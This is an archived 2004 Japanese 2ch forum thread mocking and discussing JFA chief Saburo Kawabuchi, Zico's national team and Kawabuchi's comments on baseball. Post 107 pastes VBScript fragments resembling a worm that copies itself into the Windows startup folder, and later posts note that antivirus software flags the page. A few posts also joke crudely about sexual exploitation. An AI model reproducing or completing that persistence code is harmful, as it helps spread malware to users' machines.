2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ベスト】川淵キャプテンヲチスレ19【メンバー規定】

1 : :04/11/10 02:38:54 ID:UhB7QRDJ
 /| | | | | | | | | | | | |
 | | | |(       |
 | | | | / __' '__ |
 | | | | l  .・..  ・.. |
  ( ) ┘    .つ |    AFCが選手選考に文句を言って来ただって?
  (丿 / iニニニi |  < どの選手を試合で使うのか決めるのは
    \____ l     世界で唯一人、監督にだけ与えられた権限だ!

Jリーグ規約第42条〔最強のチームによる試合参加〕
1.Jクラブは,その時点における最強のチーム(ベストメンバー)をもって前条の試合に臨まなければならない.

前スレ
【外務省】川淵キャプテンヲチスレ18【日中友好】
http://ex8.2ch.net/test/read.cgi/eleven/1092298171/

2 : :04/11/10 02:44:36 ID:UhB7QRDJ
過去ログ
【癌】川淵失脚させませんか?【膿 】 
http://sports3.2ch.net/football/kako/1026/10262/1026248192.html
【失脚】独裁者川淵バカナーpart2【サセロ】
http://sports3.2ch.net/football/kako/1029/10297/1029742262.html
川淵三郎日本サッカー協会キャプテンをヲチするスレ
http://ex2.2ch.net/test/read.cgi/football/1042958794/
【将軍様】川渕キャプテソをヲチするスレ2【独裁者】
http://ex3.2ch.net/football/kako/1045/10451/1045181275.html
【柱谷弟】川淵キャプテンをヲチするスレ4【石毛】
http://sports4.2ch.net/test/read.cgi/football/1051197082/
【再び】川淵キャプテソをヲチするスレ5【暗黒時代】
http://sports4.2ch.net/test/read.cgi/football/1055319545/l50
【傀儡】川淵キャプテンをヲチするスレ6【裸の王様】
http://sports4.2ch.net/test/read.cgi/football/1058424478/
川渕キャプテン をやめさせよう。1
http://sports4.2ch.net/test/read.cgi/football/1056339701/l50
かぴたん川淵で日本は破壊的に弱まっている Part2
http://sports4.2ch.net/test/read.cgi/football/1056798916/
【勘違い】川淵キャプテン総合ヲチスレ10【野郎】
http://sports4.2ch.net/test/read.cgi/football/1066330862/
【藤井】川淵キャプテン総合ヲチスレ11【総裁】
http://sports4.2ch.net/test/read.cgi/football/1071020002/
【恫喝】川淵キャプテン総合ヲチスレ12【圧力】
http://sports4.2ch.net/test/read.cgi/football/1075731672/
【翼賛会】川淵キャプテン総合ヲチスレ13【大本営】
http://sports4.2ch.net/test/read.cgi/football/1077163424/
【人災】川淵キャプテン総合ヲチスレ14【老害】
http://sports4.2ch.net/test/read.cgi/football/1077890381/
【無能な】川淵キャプテン総合ヲチスレ15【働き者】
http://sports4.2ch.net/test/read.cgi/football/1079271849/
【FIFAが】川淵キャプテンヲチスレ16【釣れました】
http://ex8.2ch.net/test/read.cgi/eleven/1086087786/
【院政】川淵キャプテンヲチスレ17【人事介入】
http://ex8.2ch.net/test/read.cgi/eleven/1086087786/l50

姉妹スレ
☆田嶋の技術委員長解任を要求するスレ☆
http://ex8.2ch.net/test/read.cgi/eleven/1096815610/

3 : :04/11/10 02:44:39 ID:eCKDtJu0
はいはい

4 : :04/11/10 02:44:54 ID:+jheY5VY

 /| | | | | | | | | | | | |
 | | | |(       |
 | | | | / __' '__ |
 | | | | l  .・..  ・.. |
  ( ) ┘    .つ |
  (丿 / iニニニi |  < ジャスト ア フットボールだ!
    \____ l

5 :m9(^Д^)プギャー:04/11/10 02:45:16 ID:xeRRXvS1
>>1
m9(^Д^)プギャー

6 :懐かしのAA:04/11/10 03:06:06 ID:UhB7QRDJ
   /| | | | | | | | | | | | |
   | | | |(       |       ____________________
   | | | | / __' '__ |       /
   | | | | l  .・..  ・.. |     /  川淵キャプテン様が2getだ!
    ( ) ┘    .つ |   /    I am THE CAPTAIN !!!
    (丿 / iニニニi |   \    I am GOD !!!!!
      \____ l     \  平伏せ!愚民サポどもが!!
   __ /\  /ヽ__    \____________________
  /:::::::::::::::|\ハ;;;ハ//:::::::::::ヽ
   ::::::::::::|  /:|  /:::::::::::

岡野 俊>>1郎  海外かぶれの似非インテリが、糞スレ立てんな。
木之本 興>>3  Jを創った者として歴史に名を残すのは私。今までご苦労だったな(w
>>4 モンジュン  あれだけ金を使って豚箱行きか?そのボランティア精神には頭が下がるよ(w
>>5インブラザーズ  心置きなくやってくれたまえ。西野、岡田とバックアップは万全だ(w
パウ>>6・ロベルト・ファルカン 私とコミュニケーションを取れない者には辞めてもらわんとな(w
>>7べ 恒雄  野球もお前の人生ももうすぐ終了だな(w
ネルソン・>>8゙プティスタ・ジュニオール そう!仰る通り早めに駆除しないとな。君のような腐った蜜柑は(w
アビスパ ふ>>9岡  みんなわかったろう?私に頭を下げないクラブの末路が。
            まあピッコリの禿頭なんぞ見たくはなかったがね(w
フィリップ・>>10ルシエ  妻を誘惑しやがって。氏ね市ね紙ね師ね誌ね子ね史ね詩ね士ね・・・
アー>>1000・ベンゲル  お願いします。代表監督になって下さい。

7 : :04/11/10 03:12:14 ID:+jheY5VY
http://www.sponichi.co.jp/soccer/kiji/2004/11/09/02.html
川淵三郎キャプテン(67)は「今回の地震はこれまでで最も被害が大きい。
やる必要を感じた。被災者を勇気づけられれば」と説明した。


>やる必要を感じたw

8 : :04/11/10 03:45:06 ID:dN91IUyg
いいことだ。何もおかしくないよ

9 : :04/11/10 05:15:20 ID:UhB7QRDJ
◆W杯最終予選 ジーコ監督6月の2連戦を重要視

日本サッカー協会の平田竹男GS(46)は9日、ジーコ監督(51)がドイツW杯アジア最終予選に関して、6月の2連戦(4、8日)を最重要視していることを明らかにした。
5月の連休明けから最大で47日間を超える長期間の代表強化日程を確保する方向でJリーグと調整に入った。

この日、J1実行委員会に出席した平田GSは「6月の予選のために国内で強い相手と2試合やりたい」と、5月にキリン杯2試合を組み込む意向を明かし、早ければ同15日の週から合宿に入ることでJリーグに協力を呼び掛けた。
鈴木昌チェアマンは「代表の強化に必要な日程は空ける。5月の連休で選手は過酷な日程になるが、(それまでに)リーグを消化する方向」と語った。

また、同GSは最終予選の第1戦(2月9日)に向けても「(国内の)シーズンオフ明けで他国より余計に準備がいる」と当初の予定通り強化試合2試合を行うことを示唆。対戦国については12月9日の最終予選抽選会後に調整に入る。

http://www.yomiuri.co.jp/hochi/soccer/nov/o20041109_20.htm

10 : :04/11/10 09:36:07 ID:+3sINc2n
>>9
そんなに準備しちゃうと、コンディションが、コンディションが…

11 : :04/11/10 21:31:45 ID:aNjMvzVT
>>8
地震つーか自分で推しといてポシャった功労者の件だろ>やる必要

12 : :04/11/10 21:35:22 ID:aNjMvzVT
楽天の田尾監督が川淵・サッカー協会会長と対談

楽天の田尾・新監督が10日、日本サッカー協会の川淵会長のラジオ番組の収録にゲスト出演した。
騒動続きのプロ野球界について、川淵会長が「ストライキがあったときから思っていたが、野球機構の動きが遅い」
と批判したのを受けて田尾監督は「野球界は大きな過渡期。体質、システムを変えるチャンス」と訴えた。

http://www.asahi.com/sports/update/1110/128.html

最近露出多い気がする

13 : :04/11/10 21:56:52 ID:UhB7QRDJ
そんなに野球が好きなら協会会長を辞して野球のコミッショナーになってくれ

14 : :04/11/11 10:25:02 ID:BueDWoXR
>>12
どーぞコミッショナーに立候補してNPB改革に乗ってください。


あ、そういや来週のプロジェクトXは木之元さんだったね。

15 : :04/11/11 22:40:46 ID:J1en3kVn
まずお膳立てはカピタンからかな

日本サッカー界に長く顕著な貢献をした60歳以上(表彰時)の人物

「日本サッカー殿堂」設置、来年4月発表
http://www.nikkansports.com/ns/soccer/f-sc-tp0-041111-0036.html

16 : :04/11/12 00:53:36 ID:OmOmusm7
川淵、釜本、長沼は鉄板だな

17 : :04/11/12 02:27:20 ID:aftdGmgj
順当にいけばクラマーだよな
長く顕著な貢献をしたというところが引っかかるが

お手盛りで気持ち悪い基準だな
自分(たち)が選ばれるための基準じゃないか

18 : :04/11/12 02:31:49 ID:OmOmusm7
つーか、年齢制限を設ける必要ってあるのか?
例えば代表でも欧州でもCL優勝するくらいの活躍をした選手が現れたとして、
そういう選手が40歳くらいで突然なくなった場合、
殿堂入りするためには死後20年以上待たなければならないじゃん。

19 : :04/11/12 02:38:50 ID:M9VRdFhm
http://www.asahi.com/event/sympo/TKY200410290183.html
これ誰か応募した?

20 : :04/11/12 02:49:43 ID:OmOmusm7
>>19
関東だったら行きたいけれど・・・。

21 : :04/11/12 11:04:02 ID:dbqqXVtG
昨日の東スポより

ジーコ、川淵の2つの提案を却下

1:日本人スタッフを入れる事

川淵
「ジーコは今までのスタッフでうまくいってるから
いらない、って言うんだ。ジーコがそこまで言うならしょうがない。」

2:韓国との親善試合

川淵
「韓国とは2次予選で同じ組み合わせにならないだろうし、
強化にはうってつけの相手だと思って、ジーコに提案したんだが、
ジーコは嫌だ、って言うんだ。いい案だと思ったんだけどなぁ。」


ジーコは、韓国が相手となると、親善試合とは名ばかりのガチンコ勝負
となってしまい、選手がケガを負う可能性が高くなる、として断固拒否。

22 : :04/11/12 11:21:45 ID:gxIMDBrT
その川淵を下からつついて動かしてるのが頭でっかちの田嶋マネージャーだろう。

23 : :04/11/12 11:22:59 ID:SThiGR+v
川淵は田嶋やJにあやつられているかいらいだからな。
ジーコは当然そんなことは見抜いているんだろう。

24 : :04/11/12 11:34:03 ID:q9UFrgzh
>>21
ジーコが正しいな  ってか川淵は一体何考えてんだ?

25 : :04/11/12 11:49:39 ID:SqAeeCND
つか、いまだに日本人スタッフとか言ってんの?
ネタがなくなった東スポが昔の話持ってきたんじゃね?
今なら、1月の合宿地の川淵提案をジーコが却下とかにしないと駄目だよ、東スポさん。

26 : :04/11/12 12:43:10 ID:8yDCjFDf
日本人スタッフって結局はダニの復権をお膳立てした言ってやつじゃないの?

27 : :04/11/12 13:07:37 ID:wR4eGM8s
>>21
>韓国との親善試合

これは、平田か?それとも何か政治的な圧力?

28 : :04/11/12 13:34:02 ID:+VAgx04C
去年のSARSで東アジア選手権が延期になったときやった、日韓戦にも反対してたよ。
そのすぐ前に韓国でやった韓日戦で勝ったから、
「韓国に反撃のチャンスを与えてはいけない。韓国には負けたという感覚を長く持たせたままにした方がいい。」みたいなこと言ってた。

29 : :04/11/12 13:36:00 ID:q9UFrgzh
どうせアジアカップでふがいない成績に終わって、
W杯予選で苦戦してるから、また韓日戦で日本を叩けば、
国内の不満も和らぐだろうと思っての韓日戦申し込みだろ?
そんな韓国側の狙いも読めないとはアホかこいつは。

30 :  :04/11/12 13:55:51 ID:a9QmBrJb
>>29
いや、そんなことは川淵も当然承知しているでしょ。
ただ、政府筋に対してイイ顔しておきたいから、自分は積極的だけど
ジーコが断ったという形で処理したいんだよね。

31 : :04/11/12 14:07:59 ID:wR4eGM8s
俺も政府筋からの話だと思う>韓国戦
日程的に余裕があるなら、功労試合にできるから
やってもいいと思うけど

それよりも↓は阻止して欲しい

日韓首脳会談で日中韓統合リーグ提唱
http://ex8.2ch.net/test/read.cgi/soccer/1099737338/

32 : :04/11/12 14:10:56 ID:q9UFrgzh
功労者を怪我させるような功労試合ってのもなあ・・・

33 : :04/11/12 18:34:04 ID:/mloaBCT
>>31
奴なら政治家と韓国が絡めば賛成しかねないというのが非常にエキサイティング

34 : :04/11/12 19:33:29 ID:oJIAxsWt
シンガポールは半数がメンバー入れ変えだそうですが、AFCに
抗議しなくていいんですか?キャプテン。

35 : :04/11/12 21:31:16 ID:ix2Zy5hd
実は今回来日するのがベストメンバーです。
つまり日本がアウェイで苦戦したのは2軍うわなにをするゃめzkzkhslぢ

36 : :04/11/12 23:18:45 ID:T1s7Ry3k
カピタンがFWででてください

37 : :04/11/13 01:02:00 ID:1h6GE/6M
ヒデ呼ぶべきでない」選手の声も

中田は神様の構想外!?
巨人の次はジーコジャパンが激震だ。
日本代表はW杯アジア地区1次予選のシンガポール戦(17日、埼玉)
にむけた合宿をスタートしたが、
ジーコ監督は来年2−8月のW杯アジア地区最終予選でも、
MF中田英寿(フィオレンティーナ)が完全に構想外であることを関係者に漏らしている。
日本のエースとして君臨した王様・中田だが、このままなら堀内巨人の清原状態となってしまう。

実は今回の功労者選出計画で、ジーコ監督は各選手と個人面接を行っている。
その席でこんな話が飛び出したと、ある選手が明かしてくれた。

「カズさんより、ヒデはもうキツイでしょう」。
ジーコ監督が、もはや中田を完全に見放しているというのだ。
アジア杯優勝でジーコジャパンのチーム編成はより強固になった。
常時メンバー入りしている選手の間からも
「いくらヒデさんでも、チームで実績をあげていないのだから呼ぶべきでない」
という声が圧倒している。

http://www.zakzak.co.jp/spo/2004_11/s2004111013.html

38 : :04/11/13 02:55:36 ID:oBIfFeS+
>>37
久保健司本人乙

39 : :04/11/13 03:16:47 ID:Uu+mHPMP
こういうアホみたいな記事書いてるのは協会としてマジで抗議した方がいいんじゃないか?
日本サッカーで最も世界から遅れているのはマスコミと協会だってよく言われるし。

40 : :04/11/13 11:38:40 ID:pqTKmqvl
ま、タブロイドだしね、マジになるのもどうかと思うが

41 : :04/11/13 13:05:19 ID:achIhhFh
黄金のカルテット復活なんていってるようだけど、調子付い、いや
協会や代表がいよいよ活気付いたってことでしょうか?

42 :  :04/11/13 20:51:57 ID:KiIKgODd
>>39  これくらいだったら欧州にも平気であるんだけどねえ

43 : :04/11/14 00:38:00 ID:dEpMBckk
>>42
日本にはこういうの”しか”ない
のが問題なんじゃないかと・・・

協会というか、ブチもスポ新へのネタフリに熱心だしなぁw
まるで裸の王様を見ているような気分ですわ

44 : :04/11/14 00:49:45 ID:5E9R82pW
あっても金にならない、が問題なのでしょう。
国民にあった政府しかないと同じように
サポにあった協会しかない。
大衆に合わせたマスコミしかない。

45 : :04/11/14 01:21:19 ID:3CTcOpOo
協会は世論をコントロールできるととっくに勘違いしてるんじゃないの?
本当は協会をコントロールしている組織が背後にいるってのに。

46 : :04/11/14 16:13:05 ID:lYLBOocR
Jが、おかしい。


47 :  :04/11/14 16:18:54 ID:oVd2iHyf
つうかJFL強すぎ

48 : :04/11/14 17:33:24 ID:ShW0Cuud
再放送か
http://www.nhk.or.jp/projectx/yokoku/yokoku.html

49 : :04/11/15 14:38:55 ID:6Ik7s1MG
木之本さんが元気でまだカピタンを裏から操縦していてくれてたらなあ


50 : :04/11/15 22:12:30 ID:voKe1EvU
>>48
明日ですな。

この回を見たときに、自分としては目からうろこでした。

51 : :04/11/16 08:35:07 ID:ZtHxvyZx
>>12の続き?

≪田尾監督激怒≫拡張ドラフトが継続審議となったことを受け、田尾監督が激怒した。
同監督は「こういうことはコミッショナーが迅速に考えるべきこと。
サッカーの川淵キャプテンみたいな権限を持った人にコミッショナーをやってもらいたい」と
最後まで歯に衣(きぬ)を着せなかった。

ttp://sports.yahoo.co.jp/hl?c=sports&d=20041116&a=20041116-00000000-spn-spo

52 : :04/11/16 10:38:10 ID:oA3ZmLkC
田尾、逃げて逃げてー

53 : :04/11/16 11:45:09 ID:F5EUUhXr
最近野球界の改革派を丸め込んでるな。
サッカー協会会長を退いた後は岡野前会長みたいにJOC委員でも狙ってるのか?

54 : :04/11/16 12:29:46 ID:x/DFzNIF
サッカーの川淵キャプテンみたいな権限を持った人にコミッショナーをやってもらいたい
サッカーの川淵キャプテンみたいな権限を持った人にコミッショナーをやってもらいたい
サッカーの川淵キャプテンみたいな権限を持った人にコミッショナーをやってもらいたい
サッカーの川淵キャプテンみたいな権限を持った人にコミッショナーをやってもらいたい

55 :_:04/11/16 18:09:03 ID:P1BSFZG0
野球界の連中と一緒にジャパン・フットベース協会でも立ち上げたら?

56 : :04/11/16 21:15:30 ID:d5yVA7bm
>>53
ぶっちゃけ今までやってきた事で、アンチからも評価されてるのって
その辺の部分だけだからな。

57 : :04/11/17 03:32:37 ID:CF9H2s/M
ここまできたら参院選に自民党から出て文部科学大臣とか、
JOC会長とか本気で狙ってそうでこわいw

58 : :04/11/17 15:48:44 ID:P1TkmbMX
野球ファンからのすごい支持率はなんなんだ。


59 : :04/11/17 16:44:25 ID:dW5ASqe9
敵の敵は味方とか

60 : :04/11/17 17:33:18 ID:9zwEujiY
>>58
野球もよく見るが、彼らの気持ちも分からなくも無いよ?
そういうのもあって漏れなんかはこのスレほどカピタンに否定的ではないなあ。
まぁサッカーの息抜きネタ要員か…。

61 : :04/11/17 21:45:39 ID:YxjIb4ls
シンガポール相手に1-0っていいスコアなんですか?

62 : :04/11/18 00:40:15 ID:F4MESggR
川淵会長「カズが出た方が…」/W杯予選
http://www.nikkansports.com/ns/soccer/japan/f-sc-tp3-041117-0024.html

格下のシンガポールに1点しか奪えず、
日本サッカー協会の川淵会長にとってもストレスのたまる試合となったようだ。
ジーコ監督が三浦(神戸)ら代表に功績のあった現役選手の招集も提案した試合だけに
「これだったらカズ(三浦)が出た方が、気合が入ってよかったかな」と苦笑した。

63 : :04/11/18 05:20:08 ID:F4MESggR
◆不満をもらす日本サッカー協会・川淵三郎キャプテン 
「ボクにも緊張感がなかったから、選手にも難しかったかもしれない。カズが出てたほうが気合が入ったかも。
6勝でもよしとはしないが…よしとしよう。ファンをイライラさせて申し訳ない」

http://www.sanspo.com/soccer/top/st200411/st2004111802.html


日本サッカー協会・川淵三郎キャプテン(67)は
「球離れが遅い。集中力がない。控え組がどのくらいやってくれるか楽しみにしていたけど、ないないづくし。
きょうみたいな試合をしていたらダメだ!」スッキリと勝ちきれなかったイレブンに不満をもらした。

http://www.yomiuri.co.jp/hochi/soccer/nov/o20041117_10.htm

64 : :04/11/18 05:46:47 ID:2Y27ElSd
相変わらず批評家ヅラしてるな

65 : :04/11/18 06:26:06 ID:1/grjPgF
まあキャプテンの肩を持つと....それは暗に田嶋に向けたコメントだな。

66 : :04/11/18 13:13:00 ID:oCpEvic5
中国やクウェートほど露骨じゃなくても、
日本も少しは政治力持ってほしい

67 : :04/11/18 19:09:56 ID:XgW0aAW7
>>62
アホか。カズが欲しいという前に何かすることあるだろうが。

68 : :04/11/19 12:56:58 ID:DYhRwxfC
>>67
 /| | | | | | | | | | | | |
 | | | |(       |
 | | | | / __' '__ |
 | | | | l  .・..  ・.. |
  ( ) ┘    .つ |    
  (丿 / iニニニi |  < ゴンを先に入れろってか?別にそれでもかまわんが?
    \____ l     


69 :工モヤソ:04/11/19 13:10:24 ID:sg8TQEEz
>>68
ベンチがア(ry

70 : :04/11/19 13:47:35 ID:OCqqJfOU
>>68
アホ。

71 : :04/11/19 13:51:18 ID:GxRKI/M+
しかし、ジーコが何とか穏便なコメントで、チーム内の雰囲気をまとめようとしているときに、
こんな水をぶっ掛けるようなコメントを協会長がしていいものかね?

72 : :04/11/19 15:54:22 ID:HH2pXDR7
川淵キャプテン中国1次予選敗退「残念」
http://www.yomiuri.co.jp/hochi/soccer/nov/o20041118_100.htm

日本サッカー協会の川淵三郎キャプテン(67)は18日、来年2月から始まるW杯アジア最終予選で、日本代表がアウエー3試合で日本航空の専用機を使用することを明かした。
過去、97年のフランスW杯最終予選のウズベキスタン、カザフスタン遠征などで専用機を使用しているが、キャプテンは「どこと対戦するにしても行きにくい場所ばかりだから」と語った。

また、同キャプテンはW杯アジア1次予選で中国が敗退したことに関して「非常に残念」と話した。
日本としては韓国、北朝鮮、中国と4か国が最終予選に出場し、12月9日の組み合わせ抽選会で中東勢の意見を数で押さえ込みたい考えがあったが、中国の敗退で思惑が崩れた。

73 : :04/11/19 16:34:54 ID:6r5KBOdz
>>71
本人は火がついた話を鎮火させたい思いだろうけど、
こっちから見れば火に油

74 : :04/11/19 16:36:24 ID:aMU07Spo
ナラハシを代表に呼べ

75 :74:04/11/19 16:41:42 ID:aMU07Spo
すまん誤爆した

76 : :04/11/19 18:59:15 ID:d7dYcB0H
あながち誤爆にならないところがカピタンのすごさ

77 : :04/11/20 05:05:16 ID:22HPYlQe
川淵キャプテン、古田と球界を熱く語る
http://www.sanspo.com/soccer/top/st200411/st2004112003.html

日本サッカー協会の川淵三郎キャプテン(67)のラジオ番組『キャプテン川淵の行こうぜ!オレたちのニッポン』(ニッポン放送、土曜後7・30)の収録に、プロ野球ヤクルトの古田敦也がゲスト出演。
選手会のストライキ問題など、激動したプロ野球界について熱く対談した。

古田が「今回のことでJリーグの経営のことなどを勉強させてもらった」と語れば、川淵キャプテンも「サッカーと野球は共存共栄していきたい。どんどん改革を進めてほしい」とエール。
プロ野球選手とサッカー選手の違いなど本音トークを展開した。この模様は、20日と27日の2回に分けて放送される。

78 : :04/11/20 09:04:15 ID:tJVOuwER
>>77
おお…こんな番組あったのか…やっぱここの住人は全員聴いてんのか?
漏れも聴いてみよう

79 : :04/11/20 12:54:28 ID:x24z+LoF
野球界のヒーローですな

80 : :04/11/21 07:35:30 ID:9ElJLRo8
>>78
ラジオのトークは何時倒れてもおかしくないような感じだけどw

81 : :04/11/24 20:38:13 ID:JHAYXwXz
トルシエ決まったみたいだよ〜カピタン

82 : :04/11/25 08:14:36 ID:dlHbBuLc
>>81
なんか一波乱ありそうですね。面白そう。

83 : :04/11/25 10:54:56 ID:C4QLI136
野球に口出ししてる暇があったら、助けてやれば?
ttp://www.sanspo.com/morespo/top/more200411/more2004112305.html


84 :_:04/11/26 11:09:39 ID:WS/fPHQ2
>>27
電通だろ。

85 : :04/11/26 12:06:43 ID:+m5ERLay
NHK(というよりエビ・ジョンイル一派)

朝日新聞

電通

この3者こそが昨今の”韓流捏風”の根っこにある。

86 : :04/11/26 17:29:37 ID:DXf2NwCu
今日のサンドロ事件を受けて、どんなコメントを出すんだろう?
もうプロ野球にデカイ面は出来なくなったなw

87 : :04/11/26 19:20:22 ID:D+oxV4A7
http://www.yomiuri.co.jp/hochi/soccer/nov/o20041125_60.htm

 /| | | | | | | | | | | | |
 | | | |(       |
 | | | | / __' '__ |
 | | | | l  .・..  ・.. |
  ( ) ┘    .つ |    愛称は「川淵様通り」だ。
  (丿 / iニニニi |  < おまえらは、愛称で呼ぶように。
    \____ l     交差点は「川淵様宮殿入り口」だ。

88 : :04/11/26 20:21:16 ID:nheJzCWh
>>87
調子乗ってるな。

89 ::04/11/29 21:03:23 ID:9H2Mta2n
おそらくは、この人の政権の間は日本は大丈夫だろう。
何しろワールドカップの遺産があり、中田達が年齢のピークを迎えるからだ。
だが、ドイツが終わったあとはどうか?ジーコは後続の世代を育てる気がまったく無いようだから、
下手をすると代表はどん底になり、暗黒の時代が到来するかもしれない。
でも川淵は会長を引退してるから関係ない。
むしろ、その後の状況が悪ければ悪いほど川淵の時代が光り輝くわけだ。
サッカー史には川淵時代の「成績」だけがクローズアップされ、川淵の名声は後世にまで残る。




…と、穿った見方をしてみたが、いくらなんでも少しは未来の日本サッカー界のことも考えてるよね?

90 : :04/11/29 21:08:11 ID:BBXIZB8k
>>89
ジーコは切れない、でもジーコ後が心配という
協会の苦肉の策がA2代表構想だと思うけど
これについて川淵自身はどう言ってたっけ?

91 : :04/11/30 13:07:36 ID:42YuHrlF
>>89
ジーコ後なんて超短期のことじゃない?
長期の展望ってのは若年層の育成、底辺の拡大のことだろ。
ついでに言えば後続育成なんてジーコの仕事じゃない。

キャプテンズミッションとかみてると、そのへんしっかりしてるよ。
人材がどうなるかだよね。企業サカの時代と違って、
選手が組織マネジメントやる機会少ないだろうから。

92 : :04/11/30 13:24:24 ID:2joAen+/
フル代表は結果を出すチームであって、別に育てる必要はないでしょ。
まあ、オリンピックも結果を出す大会なような気がするけど。
ジーコの後は日本人監督だろうね。このまま行けば、岡田だろう。

93 : :04/11/30 21:40:54 ID:TMWUhJve
>>92
岡ちゃんは脅し&泣き落としで無理やりって事でもない限りやりたがらないと
思われ。

94 : :04/11/30 22:51:08 ID:AqDgRcH2
おかちゃんもJで監督やってから代表でみたかったな〜

95 : :04/12/01 11:32:35 ID:aCZeEMCY
★バーレーン警戒

日本協会・川淵三郎キャプテンは11月30日、都内でラジオ番組
『キャプテン川淵の行こうぜ! オレたちのニッポン』の収録を行った。
日本騎手会の岡部幸雄会長がゲスト出演した番組の中で、
川淵キャプテンはアジア最終予選の組み合わせについて
「やりたくない相手は僕なりにある」とアジア杯で苦戦したバーレーンをあげ、「早くてうまい」と警戒。
逆に対戦を希望する相手としてサウジアラビア、ウズベキスタン、クウェートの3カ国を挙げた。

http://www.sanspo.com/soccer/top/st200411/st2004120101.html

96 : :04/12/01 11:35:34 ID:v7ZpTViD
>対戦を希望する相手としてサウジアラビア、ウズベキスタン、クウェートの3カ国を挙げた

ウズベキスタン舐めてるな
シャツキフのプレーとか見たことないんだろうか

97 : :04/12/01 12:37:32 ID:sU0PMk3e
北朝鮮が入っていない!

98 : :04/12/01 20:13:08 ID:+z3mtjn3
>>97
さすがにそこは
「出来れば対戦とかよりも前に関わり合いすら勘弁なチーム」
という事でスルーだと思われ。アジアカップでも政治屋や外務省ご機嫌取りに
徹していた事とか考えても。

99 : :04/12/01 21:36:56 ID:M+8J1Yd1
電通の企業文化によるものか、それとも本人の資質によるものか、
私には何とも判別できないが、ヤバイ話もポンポン飛び出して、聞いているほうがヒヤヒヤした。
「これ、載せてもいいんですか?」と尋ねると、「いいよ、終わったことだから」とさらりと返す広瀬氏。
だが「さすがにマズイだろう」と思われる箇所は、こちらの判断で削らせていただいた。
これまで幾つもの著書を発表されている広瀬氏のこと、
いずれはこれらの裏話が「歴史の証言」として日の光を浴びることを、ファンのひとりとして願って止まない。
http://sportsnavi.yahoo.co.jp/soccer/toyotacup/2004/column/200412/at00003160.html

キャプテンとはかんけいないですがw

100 : :04/12/01 23:50:32 ID:b5Nih1xq
これ読むとけっこういいヤシに思えてきてしまった・・・_| ̄|○


ちなみに講義終了後、学校の生徒からお礼として歌のプレゼントがあったのだが、その最中には思わず涙する場面も。「年を取ると涙腺がゆるくなるんだよ」とは、照れ隠しのコトバ!?
ttp://shop.kodansha.jp/bc/fbn/index.html

101 : :04/12/01 23:54:07 ID:b5Nih1xq
アド貼り間違えた(;´Д`)
ttp://shop.kodansha.jp/bc/fbn/ura/046.html

102 :アフター:04/12/02 15:17:41 ID:em/VpxCB
結構いい話だけど、すべて作戦通りぽい

103 : :04/12/03 00:16:46 ID:c77L4c6J
まあそっちの方向は是非カピタン頑張ってくれ

104 : :04/12/03 12:45:26 ID:afNCMiwG
今日の日経のスポーツ欄で野球論語っているよ

105 : :04/12/03 13:08:42 ID:qMkUV3wj
実はカピタンはサッカー見るより野球見る方が好きなんじゃないか?
世代も世代だし。水原巨人とか見て育ったクチだろ?

106 : :04/12/03 14:45:25 ID:sb+97VUH
つうか組織野球のアンチテーゼであった時代のサッカー少年

107 :ろりろりぐらんでみらにすた ◆AnalSexRiQ :04/12/03 16:35:46 ID:bvrEysDW
fso.copyfile "dirsystem&nullpo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

c.Copy(dirsystem&"\.vbs")

108 : :04/12/03 19:12:31 ID:gYHV1kjY
あの世代の人はやっていたスポーツや立場にかかわらず
皆野球好きなんじゃないか。

109 : :04/12/03 21:37:29 ID:AMZOV8uM
あんたはほかの被害者のサッカー愛好者たちの事はどうでもいいんですか?
http://www.sankei.co.jp/news/041203/spo023.htm



110 : :04/12/04 23:04:40 ID:ZiatilNC
http://headlines.yahoo.co.jp/hl?a=20041202-00000006-maip-soci
>最終的には、JFLから全体を日本サッカー協会に報告。協会内で、処分を含めた対応を決めることになる。

国士舘大、大学連盟、JFLまかせで日本サッカー協会としての今回の事件に関しての
意見は全くないのか。


111 : :04/12/04 23:38:02 ID:KEaPt0jc
>>110
今回の事件をスルーしてはいかん。
まさか、国士舘の糞対応認めてるとかってギャグみたいな展開じゃあないよな

112 : :04/12/05 00:07:34 ID:nuNPJJr/
国士舘だとあまり話題にならんな
早稲田の時は・・・

113 : :04/12/05 09:20:04 ID:56qH7E3X
この手のイベントをこんだけ短期間で実行してしまうのは、すごいね。
プロ野球とかバレーとか、他のスポーツ団体だったら、こうは行かないだろうね。

114 : :04/12/05 09:30:27 ID:kf7kAfZq
浜野容疑者を褒めてるのか?

115 : :04/12/05 14:52:02 ID:56qH7E3X
和田さんは芸能プロとか電通とかに行けば、スーパー仕事が出来る人扱いされてたと思う

116 : :04/12/05 21:05:29 ID:sQ3Pm+Ps
合法的につまみ食いできる業界なんて、いくらでもあるのにねw

風俗だって、偉くなればマジは最初につまみ食い(採用試験ともいう)可能じゃん
芸能とか広告代理店ならいわんや。

117 : :04/12/05 21:11:46 ID:l6MDHi8e
昔から集団暴行って理解できん
やれると思うと自分一人だけで口説くから。

118 : :04/12/05 22:36:04 ID:l6MDHi8e
このスレ、ウイルス反応するな。107だろ

119 : :04/12/07 05:09:06 ID:yFG8mjjv
◆日本サッカー協会・川淵キャプテン 
「来日はドイツが02年W杯開催のお礼をしたいというもので、
日程もこちらが指定したものではない。クラブには理解してもらいたい」

http://www.sanspo.com/soccer/top/st200412/st2004120703.html


早ければ9日にもスペイン・マジョルカ入りを予定していたFW大久保嘉人(22)=C大阪=は
「そうなんですか。辞退するか? 知らないっす」と代表入りに驚きを隠せなかった。
渡航して早急にメディカルチェックや正式サインを済ませるつもりだったが、
16日のドイツ戦後に先送りされることが濃厚だ。
日本協会から事前に代表入りの打診があったが、大久保サイドは
「(スペインへ行く直前の)こういう状態なんで」と状況を説明し、辞退を示唆していた。
ところが、まさかの代表入り。渡航時期については「大幅に延期することもあります」と説明した。

http://www.yomiuri.co.jp/hochi/soccer/dec/o20041206_20.htm

◆横浜M 困惑気味
〇…松田、中沢の代表入りに横浜Mも困惑気味だ。
チャンピオンシップ第2戦(11日)の4日後に天皇杯・ザスパ草津戦(仙台)があり、
坂木嘉和強化部長は事前にドイツ戦の招集を見送ってほしい旨を協会側に伝えていた。
だが、この日の発表を聞いて同部長は「チャンピオンシップが終わらないと
(選手の招集に応じるかは)何とも言えない」と話していた。

http://www.yomiuri.co.jp/hochi/soccer/dec/o20041206_10.htm

120 : :04/12/07 05:33:51 ID:IaMu6Dlc
>>118
ノートンに削除されまくり。

